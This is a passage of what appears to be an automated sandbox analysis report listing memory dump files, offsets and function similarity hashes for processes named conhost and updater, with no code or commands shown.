                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2468659920
                                                                      • Opcode ID: dea26e7da8c6239b8ab8b855cccdcf6a6d5c3b914d4e9b93f95941bea0719a5a
                                                                      • Instruction ID: 289a9f3e5b8fa69f67f104756241ccda58c83f4f388b298dfc7c5cd85aa4be4e
                                                                      • Opcode Fuzzy Hash: dea26e7da8c6239b8ab8b855cccdcf6a6d5c3b914d4e9b93f95941bea0719a5a
                                                                      • Instruction Fuzzy Hash: 3EF06D27818F8482D2019F18E4002AFF770FF9E799F605726EBC8266A4EF2DD502C704

                                                                      Executed Functions

                                                                      Function 00007FF6028112FD Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1710894177.00007FF602811000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF602810000, based on PE: true
                                                                      • Associated: 00000018.00000002.1710867337.00007FF602810000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1710920737.00007FF602816000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1711013736.00007FF60281E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1711411987.00007FF602822000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1712285483.00007FF602D85000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1712322067.00007FF602D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1712346842.00007FF602D8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1712369317.00007FF602D90000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000018.00000002.1712394094.00007FF602D91000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ff602810000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 6a7c32b4ee99d95e1c8dc8cb70a9b853a9799724de73b284ed21fa762e9c398f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 3BB09264A2420584E3002B1198412682A206F14B04FA02120C50C82396CEEC94814720